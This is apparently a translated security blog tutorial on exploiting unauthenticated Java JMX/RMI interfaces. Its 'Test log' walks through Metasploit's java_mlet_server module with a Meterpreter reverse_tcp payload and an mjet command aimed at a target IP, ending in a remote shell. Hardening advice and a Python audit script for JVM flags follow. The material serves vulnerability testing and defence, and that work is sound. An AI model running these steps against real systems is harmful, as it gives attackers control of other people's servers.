Contents

#JMX basics
The official description:
JMX (Java Management Extensions) is a framework for adding management functionality to applications, devices, systems and so on. JMX spans heterogeneous operating system platforms, system architectures and network transport protocols, so that seamlessly integrated system, network and service management applications can be developed flexibly.
It is commonly used to monitor a JVM: the service exposes a port, and connecting to it with the official jconsole lets you inspect all kinds of information about the running JVM application.

Java Management Extensions (JMX) Technology

#Insecure configuration

From Oracle's official documentation:

Disabling Security
To disable both password authentication and SSL (namely to disable all security), you should set the following system properties when you start the Java VM.

com.sun.management.jmxremote.authenticate=false
com.sun.management.jmxremote.ssl=false

Caution - This configuration is insecure: any remote user who knows (or guesses) your port number and host name will be able to monitor and control your Java applications and platform. Furthermore, possible harm is not limited to the operations you define in your MBeans. A remote client could create a javax.management.loading.MLet MBean and use it to create new MBeans from arbitrary URLs, at least if there is no security manager. In other words, a rogue remote client could make your Java application execute arbitrary code.

Consequently, while disabling security might be acceptable for development, it is strongly recommended that you do not disable security for production systems.

With authentication disabled, arbitrary code execution is possible.
The Metasploit module description reads as follows:

This module takes advantage a Java JMX interface insecure configuration, which would allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while interfaces with authentication enabled will be vulnerable only if a weak configuration is deployed (allowing to use javax.management.loading.MLet, having a security manager allowing to load a ClassLoader MBean, etc

When password authentication is enabled, additional weak settings have to be present before it can be exploited.

#Exploit tool
The exploit can be carried out with mjet. The procedure follows JMX RMI Exploit Demo.

#Test log
Install mjet:

git clone https://github.com/mogwaisec/mjet

Copy the "MBean" folder to "data/java/metasploit"
Copy java_mlet_server.rb to "modules/exploits/multi/misc/"

In Kali 1.1.0 the Metasploit path is /opt/metasploit/apps/pro/msf3

Start Metasploit:

msf exploit(java_mlet_server) > use exploit/multi/misc/java_mlet_server 
msf exploit(java_mlet_server) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf exploit(java_mlet_server) > set LHOST 13.7.8.53
LHOST => 13.7.8.53
msf exploit(java_mlet_server) > set LPORT 29999
LPORT => 29999
msf exploit(java_mlet_server) > run
[*] Exploit running as background job.
[*] Started reverse handler on 13.7.8.53:29999 
msf exploit(java_mlet_server) > [*] Using URL: http://0.0.0.0:8080/2B7JthqVZW
[*]  Local IP: http://13.7.8.53:8080/2B7JthqVZW
[*] Server started.


Take the payload URL and pass it to mjet as the -u parameter, together with the target host (-t) and its JMX port (-p):

java -jar mjet/mjet.jar -p 9090 -u http://13.7.8.53:8080/2B7JthqVZW -t 42.91.1.1


msf obtains a session.

[screenshot: Meterpreter session; image taken from the article JMX RMI Exploit 实例]

#Notes on a failed test
During testing I found that if you skip msf and host the malicious MBean on your own web server, the jar must be configured correctly: if it is wrong, every later attempt keeps loading the first, broken jar and the exploit fails until the target service is restarted.

#Enabling a secure configuration
So it’s important to keep in mind that setting java.rmi.server.hostname has no effect on whether or not this is an insecure configuration. If you actually want to secure your JMX RMI port, you have many options, such as (in decreasing order of preference):

Don’t pass com.sun.management.jmxremote.port. This will start a local-only JMX server, and you can get the connection address from com.sun.management.jmxremote.localConnectorAddress  http://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html
Enable SSL client certificate authentication
Enable password authentication and use SSL
Firewall your JMX RMI port
Source: http://www.accuvant.com/blog/exploiting-jmx-rmi

Besides enabling password authentication and SSL, you can also firewall the port. The article also recommends not specifying a port at all, and points out that setting java.rmi.server.hostname has no bearing on whether the configuration is insecure; I have not tested that point specifically.
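The following is an added example (not code from the original page, from mjet or from Metasploit) that ties the insecure configuration section above to the hardening options listed here. It classifies the com.sun.management.jmxremote.* flags on a JVM command line using the rule from the Oracle caveat: an agent is only remotely reachable when .port is set, and it is exposed when authentication or SSL is then switched off (Oracle defaults both to true when the property is absent). It also emits the flag set for the "password authentication and SSL" option. The sample command lines, the file paths and the script name jmx_audit.py are all assumptions; on a real host feed it the output of ps -ewwo args.

```python
"""Audit JVM command lines for insecure JMX remote settings.

Added example, not from the original page, mjet or Metasploit.
Run stand-alone to classify the constructed SAMPLE_CMDLINES, or pipe
real process lines in:   ps -ewwo args | python3 jmx_audit.py
"""
import re
import sys

# One -D flag of the com.sun.management.jmxremote family. Group 1 is the
# suffix after "jmxremote." (absent for the bare enable flag), group 2
# the value after "=" (absent when the flag is given without a value).
PROP_RE = re.compile(
    r"-Dcom\.sun\.management\.jmxremote(?:\.([\w.]+))?(?:=(\S+))?"
)


def jmx_props(cmdline):
    """Return {suffix: value} for every jmxremote property on the line.

    The bare -Dcom.sun.management.jmxremote is stored as 'jmxremote';
    a flag given without '=' is treated as 'true', as the JVM does.
    """
    props = {}
    for m in PROP_RE.finditer(cmdline):
        suffix, value = m.group(1), m.group(2)
        props[suffix or "jmxremote"] = value if value is not None else "true"
    return props


def _is_true(props, key, default):
    return props.get(key, str(default)).lower() == "true"


def classify(cmdline):
    """Classify one JVM command line.

    no-jmx              no jmxremote properties at all
    local-only          agent enabled but no .port: not reachable remotely
    client-cert         SSL with client certificate authentication required
    unauthenticated     remote port with authenticate=false: the mjet case
    cleartext-password  password auth but SSL off: credentials sniffable
    password-over-ssl   password auth and SSL: the minimum for production

    java.rmi.server.hostname is deliberately ignored: it only changes the
    address handed to clients, not whether access is controlled.
    """
    p = jmx_props(cmdline)
    if not p:
        return "no-jmx"
    if "port" not in p:
        return "local-only"
    auth = _is_true(p, "authenticate", True)
    ssl = _is_true(p, "ssl", True)
    if ssl and _is_true(p, "ssl.need.client.auth", False):
        return "client-cert"
    if not auth:
        return "unauthenticated"
    if not ssl:
        return "cleartext-password"
    return "password-over-ssl"


def hardened_flags(port, password_file, access_file, keystore, keystore_password):
    """Flags for the 'password authentication and SSL' option.

    The file paths are placeholders for whatever the deployment uses.
    The password file must be readable only by its owner (chmod 600) or
    the JVM refuses to start the agent; registry.ssl protects the RMI
    registry lookup as well as the connector itself.
    """
    return [
        f"-Dcom.sun.management.jmxremote.port={port}",
        "-Dcom.sun.management.jmxremote.authenticate=true",
        f"-Dcom.sun.management.jmxremote.password.file={password_file}",
        f"-Dcom.sun.management.jmxremote.access.file={access_file}",
        "-Dcom.sun.management.jmxremote.ssl=true",
        "-Dcom.sun.management.jmxremote.registry.ssl=true",
        f"-Djavax.net.ssl.keyStore={keystore}",
        f"-Djavax.net.ssl.keyStorePassword={keystore_password}",
    ]


# Constructed sample process lines, not captured from a real host.
SAMPLE_CMDLINES = [
    # the configuration the Oracle caveat warns about
    "java -Dcom.sun.management.jmxremote.port=9090 "
    "-Dcom.sun.management.jmxremote.authenticate=false "
    "-Dcom.sun.management.jmxremote.ssl=false -jar app.jar",
    # hostname set and SSL left at its default: still no authentication
    "java -Djava.rmi.server.hostname=10.0.0.5 "
    "-Dcom.sun.management.jmxremote.port=9090 "
    "-Dcom.sun.management.jmxremote.authenticate=false -jar app.jar",
    # agent without a port: local attach only
    "java -Dcom.sun.management.jmxremote -jar app.jar",
    # password file configured but SSL switched off
    "java -Dcom.sun.management.jmxremote.port=9090 "
    "-Dcom.sun.management.jmxremote.ssl=false "
    "-Dcom.sun.management.jmxremote.password.file=/etc/jmx/jmxremote.password "
    "-jar app.jar",
    "java -Xmx2g -jar app.jar",
]


def audit(lines):
    """Return (verdict, cmdline) for every line that mentions jmxremote."""
    return [(classify(l), l.strip()) for l in lines if "jmxremote" in l]


if __name__ == "__main__":
    source = SAMPLE_CMDLINES if sys.stdin.isatty() else sys.stdin
    for verdict, cmdline in audit(source):
        print(f"{verdict:20s} {cmdline[:100]}")
```

The verdict a practitioner wants to act on first is "unauthenticated": that is exactly the state the Metasploit module and mjet need, with or without SSL. "cleartext-password" is not remotely exploitable by the MLet trick on its own, but the credentials cross the wire in the clear, which is why the Accuvant list pairs password authentication with SSL rather than offering it alone.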

#References
Exploiting JMX RMI
Official JMX configuration documentation
